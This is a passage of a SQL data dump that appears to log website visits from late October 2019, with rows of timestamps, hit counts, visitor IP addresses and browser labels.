0,'157.55.39.156','other'),(457827,1571983178,1,1,0,0,'141.8.142.50','other'),(457828,1571983711,1,1,0,0,'91.196.178.185','chrome'),(457829,1571983973,1,1,0,0,'207.46.13.64','other'),(457830,1571984578,1,1,0,0,'157.55.39.150','other'),(457831,1571985182,1,1,0,0,'13.66.139.0','other'),(457832,1571985348,1,1,0,0,'91.196.178.90','firefox'),(457833,1571985386,1,1,0,0,'66.249.64.94','chrome'),(457834,1571985466,1,1,0,0,'95.108.213.61','other'),(457835,1571986776,1,1,0,0,'5.45.207.49','other'),(457836,1571987039,1,1,0,0,'209.17.96.242','other'),(457837,1571987612,1,1,0,0,'66.249.64.66','chrome'),(457838,1571988236,1,1,0,0,'60.191.38.77','firefox'),(457839,1571988367,1,1,0,0,'195.5.33.54','chrome'),(457840,1571989165,1,1,0,0,'91.196.177.193','chrome'),(457841,1571989260,2,2,0,0,'66.249.64.69','chrome'),(457842,1571989360,1,1,0,0,'92.112.125.139','chrome'),(457843,1571989402,1,1,0,0,'91.196.178.72','chrome'),(457844,1571989493,1,1,0,0,'80.91.191.106','chrome'),(457845,1571989751,1,1,0,0,'31.13.127.10','other'),(457846,1571989752,1,1,0,0,'31.13.127.13','other'),(457847,1571990136,16,16,0,0,'66.249.64.94','chrome'),(457848,1571990193,5,5,0,0,'66.249.64.66','chrome'),(457849,1571990565,1,1,0,0,'92.112.125.139','chrome'),(457850,1571991688,2,2,0,0,'8.29.198.27','other'),(457851,1571991803,1,1,0,0,'46.166.172.63','chrome'),(457852,1571992435,1,1,0,0,'195.10.210.70','chrome'),(457853,1571992549,1,1,0,0,'178.154.200.60','other'),(457854,1571992562,1,1,0,0,'66.249.64.66','chrome'),(457855,1571993449,1,1,0,0,'141.8.132.31','other'),(457856,1571994089,2,2,0,0,'66.249.64.94','chrome'),(457857,1571994487,1,1,0,0,'95.67.34.18','chrome'),(457858,1571994637,3,3,0,0,'66.249.64.66','chrome'),(457859,1571995208,1,1,0,0,'91.196.178.72','chrome'),(457860,1571996216,1,1,0,0,'207.46.13.150','other'),(457861,1571996737,1,1,0,0,'66.249.64.69','chrome'),(457862,1571998227,1,1,0,0,'66.249.64.66','chrome'),(457863,1571998269,1,1,0,0,'207.46.13.150','other'),(457864,1571998374,1,1,0,0,'91.209.11.236','other'),(457865,1571998502,1,1,0,0,'5.53.119.234','chrome'),(457866,1571999477,1,1,0,0,'66.249.64.66','chrome'),(457867,1572000532,2,2,0,0,'5.53.119.234','chrome'),(457868,1572000745,3,3,0,0,'207.46.13.150','other'),(457869,1572002587,1,1,0,0,'8.29.198.25','other'),(457870,1572002898,1,1,0,0,'8.29.198.27','other'),(457871,1572003367,1,1,0,0,'207.46.13.150','other'),(457872,1572003692,2,2,0,0,'91.209.11.236','other'),(457873,1572003883,1,1,0,0,'46.200.49.83','chrome'),(457874,1572004200,1,1,0,0,'176.113.209.243','chrome'),(457875,1572004350,1,1,0,0,'37.9.113.97','other'),(457876,1572004830,2,2,0,0,'91.209.11.236','other'),(457877,1572005031,2,2,0,0,'207.46.13.150','other'),(457878,1572005399,1,1,0,0,'5.45.207.49','other'),(457879,1572005631,1,1,0,0,'141.8.142.177','other'),(457880,1572005724,1,1,0,0,'185.94.192.87','other'),(457881,1572006069,2,2,0,0,'91.209.11.236','other'),(457882,1572006388,1,1,0,0,'80.91.191.106','chrome'),(457883,1572006584,1,1,0,0,'5.45.207.65','other'),(457884,1572006589,1,1,0,0,'141.8.142.50','other'),(457885,1572007111,1,1,0,0,'185.15.56.22','other'),(457886,1572007601,1,1,0,0,'109.74.154.72','chrome'),(457887,1572007980,1,1,0,0,'66.249.64.66','chrome'),(457888,1572009197,1,1,0,0,'207.46.13.56','other'),(457889,1572009258,1,1,0,0,'91.209.11.236','other'),(457890,1572010013,1,1,0,0,'37.9.113.142','other'),(457891,1572010046,1,1,0,0,'46.211.243.41','chrome'),(457892,1572010849,1,1,0,0,'95.108.213.61','other'),(457893,1572011106,1,1,0,0,'157.55.39.181','other'),(457894,1572012058,1,1,0,0,'141.8.188.18','other'),(457895,1572012084,1,1,0,0,'5.45.207.65','other'),(457896,1572012715,1,1,0,0,'207.46.13.56','other'),(457897,1572012803,1,1,0,0,'46.166.172.63','other'),(457898,1572013266,1,1,0,0,'141.8.188.66','other'),(457899,1572013464,2,2,0,0,'8.29.198.27','other'),(457900,1572014946,1,1,0,0,'66.249.64.66','chrome'),(457901,1572015452,1,1,0,0,'157.55.39.180','other'),(457902,1572016621,1,1,0,0,'193.106.30.99','chrome'),(457903,1572016655,1,1,0,0,'37.9.113.200','other'),(457904,1572017793,2,2,0,0,'157.55.39.181','other'),(457905,1572018408,1,1,0,0,'141.8.183.18','other'),(457906,1572018929,1,1,0,0,'141.8.142.50','other'),(457907,1572018950,1,1,0,0,'141.8.142.177','other'),(457908,1572020028,1,1,0,0,'157.55.39.180','other'),(457909,1572020072,1,1,0,0,'207.46.13.56','other'),(457910,1572020128,1,1,0,0,'157.55.39.181','other'),(457911,1572021084,1,1,0,0,'66.249.64.94','chrome'),(457912,1572021127,1,1,0,0,'91.196.178.94','chrome'),(457913,1572021467,1,1,0,0,'64.246.165.170','firefox'),(457914,1572023598,1,1,0,0,'157.55.39.181','other'),(457915,1572023796,1,1,0,0,'207.46.13.56','other'),(457916,1572024332,1,1,0,0,'8.29.198.26','other'),(457917,1572024681,1,1,0,0,'8.29.198.27','other'),(457918,1572024866,1,1,0,0,'95.108.213.3','other'),(457919,1572025341,1,1,0,0,'66.249.64.27','chrome'),(457920,1572025412,1,1,0,0,'66.249.64.28','chrome'),(457921,1572026000,1,1,0,0,'95.108.213.61','other'),(457922,1572026066,1,1,0,0,'207.46.13.56','other'),(457923,1572026831,1,1,0,0,'66.249.64.27','chrome'),(457924,1572027308,1,1,0,0,'66.249.64.28','chrome'),(457925,1572027384,1,1,0,0,'207.46.13.56','other'),(457926,1572027571,1,1,0,0,'13.66.139.0','other'),(457927,1572028534,1,1,0,0,'95.108.213.61','other'),(457928,1572028703,1,1,0,0,'13.66.139.0','other'),(457929,1572029154,1,1,0,0,'66.249.64.26','chrome'),(457930,1572029227,1,1,0,0,'66.249.64.27','chrome'),(457931,1572029477,1,1,0,0,'141.8.132.12','other'),(457932,1572029818,1,1,0,0,'185.156.174.13','chrome'),(457933,1572029905,1,1,0,0,'157.55.39.221','other'),(457934,1572030102,1,1,0,0,'91.209.11.236','other'),(457935,1572030130,1,1,0,0,'157.55.39.180','other'),(457936,1572030646,2,2,0,0,'66.249.64.27','chrome'),(457937,1572032045,1,1,0,0,'66.249.64.28','chrome'),(457938,1572032977,1,1,0,0,'157.55.39.129','other'),(457939,1572033322,3,3,0,0,'66.249.64.26','chrome'),(457940,1572034116,1,1,0,0,'66.249.64.28','chrome'),(457941,1572034860,1,1,0,0,'207.46.13.173','other'),(457942,1572035096,1,1,0,0,'207.46.13.105','other'),(457943,1572035186,2,2,0,0,'8.29.198.26','other'),(457944,1572035670,2,2,0,0,'207.46.13.86','other'),(457945,1572035729,1,1,0,0,'66.249.64.26','chrome'),(457946,1572035836,1,1,0,0,'66.249.64.28','chrome'),(457947,1572036123,1,1,0,0,'89.46.102.14','msie'),(457948,1572036739,1,1,0,0,'207.46.13.86','other'),(457949,1572036816,1,1,0,0,'95.108.213.39','other'),(457950,1572037873,1,1,0,0,'207.46.13.173','other'),(457951,1572038830,1,1,0,0,'66.249.64.27','chrome'),(457952,1572041053,1,1,0,0,'34.223.40.66','chrome'),(457953,1572041124,1,1,0,0,'66.249.64.28','chrome'),(457954,1572041782,1,1,0,0,'66.249.64.26','chrome'),(457955,1572042299,1,1,0,0,'66.249.70.62','chrome'),(457956,1572042501,1,1,0,0,'66.249.64.28','chrome'),(457957,1572043162,1,1,0,0,'178.154.171.7','other'),(457958,1572044131,2,2,0,0,'207.46.13.86','other'),(457959,1572044852,1,1,0,0,'207.46.13.105','other'),(457960,1572044963,1,1,0,0,'207.46.13.92','other'),(457961,1572044980,1,1,0,0,'66.249.64.27','chrome'),(457962,1572046059,2,2,0,0,'8.29.198.26','other'),(457963,1572046550,1,1,0,0,'66.249.64.28','chrome'),(457964,1572047226,1,1,0,0,'141.8.188.39','other'),(457965,1572047473,1,1,0,0,'95.108.181.103','other'),(457966,1572047602,1,1,0,0,'207.46.13.173','other'),(457967,1572047610,1,1,0,0,'37.9.113.177','other'),(457968,1572047946,2,2,0,0,'66.249.64.28','chrome'),(457969,1572048175,2,2,0,0,'66.249.64.27','chrome'),(457970,1572048301,1,1,0,0,'91.196.178.131','chrome'),(457971,1572048314,1,1,0,0,'66.249.70.33','chrome'),(457972,1572049455,1,1,0,0,'66.249.64.28','chrome'),(457973,1572049766,1,1,0,0,'207.46.13.23','other'),(457974,1572049799,1,1,0,0,'207.46.13.56','other'),(457975,1572050025,1,1,0,0,'37.9.150.67','chrome'),(457976,1572050554,2,2,0,0,'66.249.64.28','chrome'),(457977,1572050736,1,1,0,0,'66.249.70.62','chrome'),(457978,1572050841,1,1,0,0,'207.46.13.56','other'),(457979,1572051035,1,1,0,0,'207.46.13.92','other'),(457980,1572052509,1,1,0,0,'39.98.77.72','other'),(457981,1572052514,1,1,0,0,'120.27.100.100','other'),(457982,1572053268,1,1,0,0,'66.249.64.26','chrome'),(457983,1572054664,1,1,0,0,'207.46.13.66','other'),(457984,1572055169,2,2,0,0,'207.46.13.56','other'),(457985,1572055187,1,1,0,0,'141.8.188.38','other'),(457986,1572055918,1,1,0,0,'157.55.39.145','other'),(457987,1572056170,1,1,0,0,'66.249.64.26','chrome'),(457988,1572056303,1,1,0,0,'207.46.13.66','other'),(457989,1572056718,2,2,0,0,'185.185.217.74','other'),(457990,1572056915,1,1,0,0,'8.29.198.27','other'),(457991,1572057287,1,1,0,0,'8.29.198.25','other'),(457992,1572058279,1,1,0,0,'80.95.45.118','chrome'),(457993,1572058638,1,1,0,0,'66.249.70.62','chrome'),(457994,1572058692,2,2,0,0,'66.249.64.28','chrome'),(457995,1572059606,1,1,0,0,'66.249.64.28','chrome'),(457996,1572059945,1,1,0,0,'207.46.13.56','other'),(457997,1572061862,1,1,0,0,'66.249.64.28','chrome'),(457998,1572062213,1,1,0,0,'207.46.13.66','other'),(457999,1572065001,1,1,0,0,'157.55.39.145','other'),(458000,1572065072,1,1,0,0,'157.55.39.47','other'),(458001,1572065758,1,1,0,0,'207.46.13.66','other'),(458002,1572066295,1,1,0,0,'66.249.64.28','chrome'),(458003,1572066365,1,1,0,0,'141.8.188.12','other'),(458004,1572067776,1,1,0,0,'8.29.198.25','other'),(458005,1572068141,1,1,0,0,'8.29.198.27','other'),(458006,1572069163,1,1,0,0,'91.3.113.122','firefox'),(458007,1572069693,1,1,0,0,'66.249.64.27','chrome'),(458008,1572069908,1,1,0,0,'66.249.64.28','chrome'),(458009,1572070022,1,1,0,0,'207.46.13.122','other'),(458010,1572070517,1,1,0,0,'87.250.224.104','other'),(458011,1572070620,1,1,0,0,'5.45.207.65','other'),(458012,1572071261,1,1,0,0,'207.46.13.31','other'),(458013,1572071684,1,1,0,0,'95.108.213.3','other'),(458014,1572072701,1,1,0,0,'157.55.39.9','other'),(458015,1572073125,3,3,0,0,'66.249.64.26','chrome'),(458016,1572074070,2,2,0,0,'207.46.13.31','other'),(458017,1572074664,2,2,0,0,'207.46.13.205','other'),(458018,1572074838,1,1,0,0,'87.250.224.104','other'),(458019,1572075517,1,1,0,0,'66.249.64.28','chrome'),(458020,1572076571,1,1,0,0,'13.66.139.0','other'),(458021,1572077682,1,1,0,0,'128.90.170.16','chrome'),(458022,1572077960,1,1,0,0,'66.249.64.28','chrome'),(458023,1572078083,1,1,0,0,'66.249.64.27','chrome'),(458024,1572078631,1,1,0,0,'8.29.198.27','other'),(458025,1572078985,1,1,0,0,'8.29.198.26','other'),(458026,1572079271,2,2,0,0,'207.46.13.43','other'),(458027,1572079752,4,4,0,0,'193.106.30.99','firefox'),(458028,1572080560,1,1,0,0,'141.8.188.39','other'),(458029,1572081630,1,1,0,0,'207.46.13.43','other'),(458030,1572082938,1,1,0,0,'66.249.64.27','chrome'),(458031,1572083816,1,1,0,0,'37.9.113.177','other'),(458032,1572086058,1,1,0,0,'157.55.39.112','other'),(458033,1572087743,1,1,0,0,'141.8.188.12','other'),(458034,1572089473,1,1,0,0,'8.29.198.25','other'),(458035,1572089845,1,1,0,0,'8.29.198.26','other'),(458036,1572090885,1,1,0,0,'207.46.13.43','other'),(458037,1572091117,1,1,0,0,'66.249.70.62','chrome'),(458038,1572091905,1,1,0,0,'95.108.213.39','other'),(458039,1572093278,1,1,0,0,'37.9.113.202','other'),(458040,1572093510,2,2,0,0,'66.249.64.28','chrome'),(458041,1572094553,1,1,0,0,'91.196.178.100','chrome'),(458042,1572094572,1,1,0,0,'109.74.154.72','chrome'),(458043,1572095508,1,1,0,0,'141.8.188.12','other'),(458044,1572095910,1,1,0,0,'157.55.39.112','other'),(458045,1572096441,1,1,0,0,'66.249.64.28','chrome'),(458046,1572096818,1,1,0,0,'37.9.113.163','other'),(458047,1572098006,1,1,0,0,'157.55.39.112','other'),(458048,1572098719,2,2,0,0,'37.73.198.52','chrome'),(458049,1572098785,1,1,0,0,'141.8.132.2','other'),(458050,1572100168,1,1,0,0,'37.73.198.52','chrome'),(458051,1572100314,2,2,0,0,'8.29.198.25','other'),(458052,1572100449,1,1,0,0,'207.46.13.43','other'),(458053,1572101073,1,1,0,0,'157.55.39.112','other'),(458054,1572101084,1,1,0,0,'37.73.198.52','chrome'),(458055,1572101114,1,1,0,0,'103.241.227.116','chrome'),(458056,1572101248,1,1,0,0,'37.9.113.97','other'),(458057,1572101465,1,1,0,0,'141.8.142.132','other'),(458058,1572102162,1,1,0,0,'66.249.70.62','chrome'),(458059,1572102197,1,1,0,0,'66.249.64.26','chrome'),(458060,1572102870,3,3,0,0,'35.225.252.132','chrome'),(458061,1572102944,3,3,0,0,'104.197.8.65','chrome'),(458062,1572102964,3,3,0,0,'35.225.91.213','chrome'),(458063,1572102975,1,1,0,0,'35.239.149.21','chrome'),(458064,1572102976,2,2,0,0,'35.239.149.21','chrome'),(458065,1572102986,1,1,0,0,'35.188.211.173','chrome'),(458066,1572102987,2,2,0,0,'35.188.211.173','chrome'),(458067,1572103000,3,3,0,0,'35.184.193.167','chrome'),(458068,1572103197,2,2,0,0,'5.45.207.49','other'),(458069,1572103895,1,1,0,0,'66.249.64.27','chrome'),(458070,1572104397,1,1,0,0,'95.108.213.61','other'),(458071,1572104489,1,1,0,0,'5.45.207.65','other'),(458072,1572105736,1,1,0,0,'157.55.39.112','other'),(458073,1572106345,1,1,0,0,'207.46.13.238','other'),(458074,1572108844,1,1,0,0,'91.243.219.20','chrome'),(458075,1572109498,1,1,0,0,'78.111.185.53','chrome'),(458076,1572109686,1,1,0,0,'66.249.64.26','chrome'),(458077,1572109995,1,1,0,0,'37.9.113.177','other'),(458078,1572110219,2,2,0,0,'77.121.123.196','chrome'),(458079,1572110391,1,0,1,0,'66.249.64.28',''),(458080,1572111166,1,1,0,0,'8.29.198.25','other'),(458081,1572111193,1,1,0,0,'95.108.213.3','other'),(458082,1572111314,1,1,0,0,'157.55.39.158','other'),(458083,1572111532,1,1,0,0,'91.196.178.100','chrome'),(458084,1572111544,1,1,0,0,'8.29.198.27','other'),(458085,1572111757,1,1,0,0,'188.163.16.155','chrome'),(458086,1572112513,1,1,0,0,'91.196.178.100','chrome'),(458087,1572112875,1,1,0,0,'66.249.64.26','chrome'),(458088,1572113326,1,1,0,0,'66.249.70.33','chrome'),(458089,1572114069,1,1,0,0,'128.124.109.132','chrome'),(458090,1572114123,1,1,0,0,'66.249.64.27','chrome'),(458091,1572114352,1,1,0,0,'207.46.13.0','other'),(458092,1572114712,2,2,0,0,'66.249.70.36','chrome'),(458093,1572115406,1,1,0,0,'66.249.64.28','chrome'),(458094,1572115440,1,1,0,0,'66.249.64.26','chrome'),(458095,1572115541,1,1,0,0,'207.46.13.0','other'),(458096,1572116368,2,2,0,0,'66.249.64.26','chrome'),(458097,1572116729,1,1,0,0,'66.249.64.28','chrome'),(458098,1572117070,2,2,0,0,'66.249.64.27','chrome'),(458099,1572117313,1,1,0,0,'66.249.64.26','chrome'),(458100,1572118295,1,1,0,0,'157.55.39.224','other'),(458101,1572118734,1,1,0,0,'66.249.64.27','chrome'),(458102,1572119111,2,2,0,0,'157.55.39.158','other'),(458103,1572119140,1,1,0,0,'176.226.151.224','chrome'),(458104,1572119605,1,1,0,0,'178.154.171.66','other'),(458105,1572122023,1,1,0,0,'8.29.198.26','other'),(458106,1572122097,1,1,0,0,'66.249.64.27','chrome'),(458107,1572122403,1,1,0,0,'8.29.198.27','other'),(458108,1572122533,1,1,0,0,'157.55.39.158','other'),(458109,1572123058,1,1,0,0,'95.108.213.3','other'),(458110,1572123623,1,1,0,0,'66.249.64.28','chrome'),(458111,1572123935,1,1,0,0,'66.249.64.27','chrome'),(458112,1572124111,1,1,0,0,'193.106.30.99','chrome'),(458113,1572124501,1,1,0,0,'207.46.13.0','other'),(458114,1572124644,1,1,0,0,'157.55.39.224','other'),(458115,1572125503,1,1,0,0,'37.9.113.177','other'),(458116,1572125509,1,1,0,0,'178.154.171.66','other'),(458117,1572125691,1,1,0,0,'37.9.113.163','other'),(458118,1572125731,1,1,0,0,'157.55.39.224','other'),(458119,1572125754,1,1,0,0,'141.8.183.33','other'),(458120,1572125851,2,2,0,0,'66.249.64.27','chrome'),(458121,1572126604,1,1,0,0,'66.249.64.26','chrome'),(458122,1572127245,1,1,0,0,'207.46.13.111','other'),(458123,1572128723,1,1,0,0,'157.55.39.224','other'),(458124,1572129102,1,1,0,0,'66.249.64.27','chrome'),(458125,1572129354,1,1,0,0,'207.46.13.0','other'),(458126,1572129667,1,1,0,0,'37.9.113.177','other'),(458127,1572129795,1,1,0,0,'66.249.64.26','chrome'),(458128,1572130134,1,1,0,0,'5.45.207.65','other'),(458129,1572131146,1,1,0,0,'66.249.70.36','chrome'),(458130,1572131696,2,2,0,0,'207.46.13.60','other'),(458131,1572131771,2,2,0,0,'207.46.13.111','other'),(458132,1572132860,1,1,0,0,'8.29.198.26','other'),(458133,1572133198,1,1,0,0,'141.8.132.12','other'),(458134,1572133203,1,1,0,0,'5.45.207.49','other'),(458135,1572133262,1,1,0,0,'8.29.198.27','other'),(458136,1572133364,1,1,0,0,'37.9.113.39','other'),(458137,1572133896,1,1,0,0,'178.213.191.206','msie'),(458138,1572134060,1,1,0,0,'66.249.64.26','chrome'),(458139,1572138056,1,1,0,0,'157.55.39.224','other'),(458140,1572139870,1,1,0,0,'66.249.64.27','chrome'),(458141,1572139947,1,1,0,0,'66.249.70.62','chrome'),(458142,1572140999,1,1,0,0,'91.196.178.34','chrome'),(458143,1572141168,1,1,0,0,'66.249.64.28','chrome'),(458144,1572141954,1,1,0,0,'178.154.200.27','other'),(458145,1572139265,1,1,0,0,'193.106.30.99','chrome'),(458146,1572140586,1,1,0,0,'207.46.13.0','other'),(458147,1572140736,1,1,0,0,'54.201.239.81','other'),(458148,1572140865,1,1,0,0,'5.45.207.49','other'),(458149,1572140880,1,1,0,0,'37.140.159.0','other'),(458150,1572141340,2,2,0,0,'66.249.64.27','chrome'),(458151,1572141636,1,1,0,0,'37.9.113.97','other'),(458152,1572142713,1,1,0,0,'207.46.13.111','other'),(458153,1572143189,1,1,0,0,'37.9.113.97','other'),(458154,1572143420,1,1,0,0,'66.249.64.28','chrome'),(458155,1572143680,1,1,0,0,'207.46.13.131','other'),(458156,1572143714,1,1,0,0,'8.29.198.27','other'),(458157,1572144108,1,1,0,0,'8.29.198.26','other'),(458158,1572145470,2,2,0,0,'66.249.64.28','chrome'),(458159,1572146349,1,1,0,0,'157.55.39.187','other'),(458160,1572146913,1,1,0,0,'66.249.64.27','chrome'),(458161,1572147121,1,1,0,0,'66.249.64.26','chrome'),(458162,1572147189,1,1,0,0,'46.211.133.217','chrome'),(458163,1572148529,2,2,0,0,'66.249.64.28','chrome'),(458164,1572148768,1,1,0,0,'13.66.139.0','other'),(458165,1572150876,1,1,0,0,'66.249.64.27','chrome'),(458166,1572151702,1,1,0,0,'37.9.113.97','other'),(458167,1572151806,1,1,0,0,'66.249.64.26','chrome'),(458168,1572154283,1,1,0,0,'157.55.39.187','other'),(458169,1572154504,2,2,0,0,'66.249.64.27','chrome'),(458170,1572154555,1,1,0,0,'8.29.198.25','other'),(458171,1572154975,1,1,0,0,'8.29.198.26','other'),(458172,1572155600,1,1,0,0,'66.249.70.62','chrome'),(458173,1572155861,1,1,0,0,'157.55.39.195','other'),(458174,1572156169,1,1,0,0,'178.154.200.27','other'),(458175,1572157133,1,1,0,0,'37.115.218.208','chrome'),(458176,1572157283,1,1,0,0,'66.249.64.26','chrome'),(458177,1572157783,1,1,0,0,'157.55.39.187','other'),(458178,1572159189,1,1,0,0,'91.196.178.164','chrome'),(458179,1572159523,1,1,0,0,'37.9.113.97','other'),(458180,1572159715,1,1,0,0,'141.8.188.12','other'),(458181,1572160013,1,1,0,0,'66.249.64.28','chrome'),(458182,1572160645,1,1,0,0,'157.55.39.195','other'),(458183,1572161014,2,2,0,0,'157.55.39.187','other'),(458184,1572161019,1,1,0,0,'207.46.13.145','other'),(458185,1572162345,1,1,0,0,'66.249.64.26','chrome'),(458186,1572162594,1,1,0,0,'66.249.64.27','chrome'),(458187,1572163662,1,1,0,0,'37.9.113.202','other'),(458188,1572164060,1,1,0,0,'66.249.64.26','chrome'),(458189,1572164088,1,1,0,0,'91.209.11.236','other'),(458190,1572164864,1,1,0,0,'66.249.64.27','chrome'),(458191,1572165388,1,1,0,0,'8.29.198.25','other'),(458192,1572165830,1,1,0,0,'8.29.198.26','other'),(458193,1572167952,1,1,0,0,'31.13.115.20','chrome'),(458194,1572167959,1,1,0,0,'31.13.115.9','chrome'),(458195,1572168219,1,1,0,0,'157.55.39.195','other'),(458196,1572168316,1,1,0,0,'207.46.13.145','other'),(458197,1572168429,1,1,0,0,'66.249.64.26','chrome'),(458198,1572169469,1,1,0,0,'91.196.178.103','chrome'),(458199,1572169727,4,4,0,0,'66.249.64.28','chrome'),(458200,1572169763,8,8,0,0,'66.249.64.26','chrome'),(458201,1572169835,2,2,0,0,'66.249.64.27','chrome'),(458202,1572170028,1,1,0,0,'95.108.213.61','other'),(458203,1572170723,1,1,0,0,'66.249.64.26','chrome'),(458204,1572170946,1,1,0,0,'66.249.64.27','chrome'),(458205,1572171251,1,1,0,0,'141.8.132.12','other'),(458206,1572171780,1,1,0,0,'58.250.125.91','other'),(458207,1572171849,2,2,0,0,'157.55.39.195','other'),(458208,1572171888,1,1,0,0,'91.196.178.103','chrome'),(458209,1572172011,1,1,0,0,'91.209.11.236','other'),(458210,1572172924,1,1,0,0,'66.249.64.28','chrome'),(458211,1572173002,2,2,0,0,'13.66.139.0','other'),(458212,1572173546,1,1,0,0,'66.249.70.36','chrome'),(458213,1572174751,1,1,0,0,'66.249.70.33','chrome'),(458214,1572175001,1,1,0,0,'66.249.70.62','chrome'),(458215,1572175178,1,1,0,0,'207.46.13.145','other'),(458216,1572175367,1,1,0,0,'95.108.181.103','other'),(458217,1572176118,1,1,0,0,'107.21.1.8','other'),(458218,1572176120,1,1,0,0,'54.208.102.37','other'),(458219,1572176228,2,2,0,0,'8.29.198.25','other'),(458220,1572176255,4,4,0,0,'66.249.64.26','chrome'),(458221,1572177251,1,1,0,0,'66.249.64.27','chrome'),(458222,1572177427,1,1,0,0,'141.8.183.33','other'),(458223,1572177598,1,1,0,0,'66.249.70.36','chrome'),(458224,1572177649,1,1,0,0,'66.249.64.26','chrome'),(458225,1572179953,1,1,0,0,'109.74.154.72','chrome'),(458226,1572180215,1,1,0,0,'66.249.64.27','chrome'),(458227,1572181197,2,2,0,0,'66.249.64.26','chrome'),(458228,1572181265,2,2,0,0,'66.249.64.28','chrome'),(458229,1572181705,1,1,0,0,'158.69.26.125','other'),(458230,1572181736,1,1,0,0,'158.69.26.125','chrome'),(458231,1572181888,1,1,0,0,'51.77.246.204','other'),(458232,1572182211,1,1,0,0,'157.55.39.182','other'),(458233,1572183521,1,1,0,0,'37.9.113.10','other'),(458234,1572184124,1,1,0,0,'66.249.64.27','chrome'),(458235,1572184426,1,1,0,0,'46.211.135.228','chrome'),(458236,1572184521,1,1,0,0,'157.55.39.182','other'),(458237,1572184588,1,1,0,0,'66.249.64.28','chrome'),(458238,1572187055,2,2,0,0,'8.29.198.25','other'),(458239,1572187806,1,1,0,0,'178.154.171.7','other'),(458240,1572188007,1,1,0,0,'141.8.132.12','other'),(458241,1572188634,1,1,0,0,'157.55.39.135','other'),(458242,1572188867,1,1,0,0,'157.55.39.182','other'),(458243,1572189465,1,1,0,0,'37.9.113.39','other'),(458244,1572189698,1,1,0,0,'157.55.39.135','other'),(458245,1572189851,2,2,0,0,'66.249.64.26','chrome'),(458246,1572190135,1,1,0,0,'66.249.70.33','chrome'),(458247,1572190210,2,2,0,0,'66.249.64.27','chrome'),(458248,1572190368,1,1,0,0,'66.249.70.36','chrome'),(458249,1572190505,1,1,0,0,'157.55.39.182','other'),(458250,1572191178,1,1,0,0,'157.55.39.135','other'),(458251,1572192049,1,1,0,0,'157.55.39.182','other'),(458252,1572192589,1,1,0,0,'91.196.178.48','chrome'),(458253,1572194666,1,1,0,0,'157.55.39.135','other'),(458254,1572195396,1,1,0,0,'178.154.171.66','other'),(458255,1572196103,1,1,0,0,'37.9.113.202','other'),(458256,1572196587,1,1,0,0,'157.55.39.193','other'),(458257,1572196625,1,1,0,0,'37.9.113.163','other'),(458258,1572197750,1,1,0,0,'157.55.39.135','other'),(458259,1572197888,1,1,0,0,'8.29.198.25','other'),(458260,1572198268,5,5,0,0,'91.196.178.172','chrome'),(458261,1572198386,1,1,0,0,'8.29.198.27','other'),(458262,1572198583,1,1,0,0,'37.9.113.177','other'),(458263,1572198736,1,1,0,0,'37.9.113.142','other'),(458264,1572199348,1,1,0,0,'46.211.147.151','chrome'),(458265,1572199587,1,1,0,0,'157.55.39.135','other'),(458266,1572199959,1,1,0,0,'46.211.140.153','chrome'),(458267,1572200493,2,2,0,0,'157.55.39.135','other'),(458268,1572200494,2,2,0,0,'223.81.146.4','other'),(458269,1572200760,3,0,3,0,'66.249.64.26',''),(458270,1572201113,1,1,0,0,'87.250.224.104','other'),(458271,1572202430,1,1,0,0,'92.243.104.76','chrome'),(458272,1572202834,1,1,0,0,'141.8.132.2','other'),(458273,1572202968,1,1,0,0,'13.66.139.0','other'),(458274,1572203828,1,1,0,0,'157.55.39.193','other'),(458275,1572204777,1,1,0,0,'157.55.39.135','other'),(458276,1572205700,1,1,0,0,'66.249.70.33','chrome'),(458277,1572205759,1,1,0,0,'157.55.39.135','other'),(458278,1572206044,1,1,0,0,'37.9.113.97','other'),(458279,1572206732,1,1,0,0,'66.249.64.28','chrome'),(458280,1572207448,1,1,0,0,'66.249.70.36','chrome'),(458281,1572207964,1,1,0,0,'66.249.64.27','chrome'),(458282,1572208681,2,2,0,0,'66.249.64.28','chrome'),(458283,1572208719,2,2,0,0,'8.29.198.27','other'),(458284,1572209186,1,1,0,0,'31.13.127.5','other'),(458285,1572209187,2,2,0,0,'31.13.127.7','other'),(458287,1572209813,1,1,0,0,'66.249.64.26','chrome'),(458288,1572211096,1,1,0,0,'138.246.253.5','chrome'),(458289,1572212505,2,2,0,0,'66.249.64.28','chrome'),(458290,1572212688,1,1,0,0,'66.249.64.27','chrome'),(458291,1572213537,1,1,0,0,'66.249.64.26','chrome'),(458292,1572213621,2,2,0,0,'66.249.64.28','chrome'),(458293,1572214024,1,1,0,0,'213.180.203.44','other'),(458294,1572214187,1,1,0,0,'66.249.70.36','chrome'),(458295,1572214420,2,2,0,0,'66.249.64.27','chrome'),(458296,1572215053,1,1,0,0,'66.249.64.26','chrome'),(458297,1572215238,1,1,0,0,'213.180.203.37','other'),(458298,1572215319,1,1,0,0,'66.249.64.28','chrome'),(458299,1572216252,2,2,0,0,'66.249.64.27','chrome'),(458300,1572216458,2,2,0,0,'66.249.64.26','chrome'),(458301,1572218059,1,1,0,0,'66.249.70.62','chrome'),(458302,1572218084,3,3,0,0,'66.249.64.26','chrome'),(458303,1572218118,1,1,0,0,'66.249.64.28','chrome'),(458304,1572218632,1,1,0,0,'157.55.39.193','other'),(458305,1572219483,2,2,0,0,'66.249.64.26','chrome'),(458306,1572219556,2,2,0,0,'8.29.198.26','other'),(458307,1572219975,3,3,0,0,'66.249.64.28','chrome'),(458308,1572220622,1,1,0,0,'66.249.70.33','chrome'),(458309,1572220659,2,2,0,0,'66.249.64.27','chrome'),(458310,1572221461,1,1,0,0,'66.249.64.26','chrome'),(458311,1572222007,1,1,0,0,'66.249.64.27','chrome'),(458312,1572222406,1,1,0,0,'66.249.64.26','chrome'),(458313,1572222469,1,1,0,0,'213.180.203.44','other'),(458314,1572222473,1,1,0,0,'66.249.70.33','chrome'),(458315,1572224410,2,2,0,0,'66.249.64.28','chrome'),(458316,1572225083,1,1,0,0,'66.249.70.33','chrome'),(458317,1572225150,1,1,0,0,'66.249.70.36','chrome'),(458318,1572225433,2,2,0,0,'66.249.64.26','chrome'),(458319,1572225477,1,1,0,0,'157.55.39.193','other'),(458320,1572225700,1,1,0,0,'66.249.64.27','chrome'),(458321,1572226306,1,1,0,0,'213.180.203.37','other'),(458322,1572227203,1,1,0,0,'157.55.39.193','other'),(458323,1572227562,1,1,0,0,'66.249.64.27','chrome'),(458324,1572228031,1,1,0,0,'66.249.70.36','chrome'),(458325,1572228048,1,1,0,0,'66.249.64.26','chrome'),(458326,1572228181,1,1,0,0,'66.249.64.28','chrome'),(458327,1572229373,1,1,0,0,'66.249.64.27','chrome'),(458328,1572229572,1,1,0,0,'13.66.139.